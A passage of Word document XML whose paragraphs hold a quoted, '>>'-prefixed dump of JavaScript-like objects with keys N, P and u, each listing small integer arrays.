      <w:r>
        <w:t>&gt;&gt;         N: [16, 13, 4, 12, 5, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF3473" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647BE516" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [60, 159, 168, 186, 220, 245, 272, 285, 311, 317, 338, 348, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00105783" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF9D9E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4528B421" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4593353E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 10, 16, 18, 178, 288]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E5853" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133F48F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDED2EA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E5B22" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210B1892" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BA5E20" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B9B73C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B748D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727179D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065B962E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D2660" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D5E52C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C5C0F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E87ED56" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA8EBE2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E2FD1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 4, 6, 9, 10, 12, 13, 14, 17, 19, 90, 139, 159, 311, 317, 339]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D425D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7757B0AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A216383" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF39F3C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 37, 147, 255]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3630AA5F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0404D5CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B0AC4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1928CD42" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D571E77" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22388BA1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E517581" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615C3C8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 6, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C04BB7A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C991FC5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964AA59" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7F3D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 32, 35, 159, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8190D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D4703" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBA3AED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02733AE4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 6, 8, 35, 238]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A6F76D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356EC5BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A432BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B18AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712EC903" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE27752" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0848C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DBBDEC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [154, 263]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7611EE35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EC618A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F66AF65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71637B5F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1080E8DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C726224" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2BE296" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA0505D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A37B847" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A57A59" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55537A3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E84F15C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C6503" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2BF10B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCAFB61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491A7D8C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F3E60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3318AC89" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549FDE6F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142519ED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 21]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E604527" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E49E1E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [14, 1, 0, 15, 9, 6, 10, 7, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736B4030" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A6E57" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [172, 304]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7F803" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B28766" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0114B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D84A751" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513AB90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA984AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78541173" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E6DED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3BEE65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1235759B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED77C7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C18D72C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40039092" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE05DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C39412" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77147DDB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D3C8F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A79197C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3743B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051EA82B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04263DF6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A23C3A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59159837" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D51EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBC7957" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87D7B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196AA062" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A97857A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E863CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B497815" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C90717A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E49D5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48435B9A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1DFA16" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28100159" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091087A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FEC3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B864482" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF2E74" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A60277" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB95F68" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318DD9E5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECFA1D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343EECD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602CCDCB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DFBBBE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F322E14" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EAF19" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B303968" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04173735" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD9970" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E42578" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 5, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427E46E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01722139" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
